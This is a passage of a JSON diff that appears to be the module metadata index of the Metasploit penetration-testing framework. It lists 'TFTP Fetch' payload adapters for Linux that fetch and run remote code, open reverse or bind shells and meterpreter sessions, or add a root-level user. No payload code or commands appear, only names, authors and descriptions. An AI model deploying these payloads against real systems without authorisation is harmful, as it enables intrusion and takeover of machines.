"targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/exec", + "staged": false + }, + "payload_cmd/linux/tftp/x64/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/tftp/x64/meterpreter/reverse_sctp": { + "name": "TFTP Fetch, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/tftp/x64/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/tftp/x64/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/x64/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/x64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/pingback_bind_tcp": { + "name": "TFTP Fetch, Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nAccept a connection from attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/pingback_reverse_tcp": { + "name": "TFTP Fetch, Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell/bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/tftp/x64/shell/reverse_sctp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/tftp/x64/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/tftp/x64/shell_bind_ipv6_tcp": { + "name": "TFTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_bind_tcp_random_port": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_find_port": { + "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "mak" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_reverse_ipv6_tcp": { + "name": "TFTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/adduser": { + "name": "TFTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/tftp/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/adduser", + "staged": false + }, + "payload_cmd/linux/tftp/x86/chmod": { + "name": "TFTP Fetch, Linux Chmod", + "fullname": "payload/cmd/linux/tftp/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nRuns chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/chmod", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/chmod", + "staged": false + }, + "payload_cmd/linux/tftp/x86/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "vlad902 ", + "Geyslan G. Bem " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/exec", + "staged": false + }, + "payload_cmd/linux/tftp/x86/generic/debug_trap": { + "name": "TFTP Fetch, Generic x86 Debug Trap", + "fullname": "payload/cmd/linux/tftp/x86/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "robert " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/linux/tftp/x86/generic/tight_loop": { + "name": "TFTP Fetch, Generic x86 Tight Loop", + "fullname": "payload/cmd/linux/tftp/x86/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "jduck " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp": { + "name": "TFTP Fetch, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp": { + "name": "TFTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/meterpreter/find_tag": { + "name": "TFTP Fetch, Find Tag Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 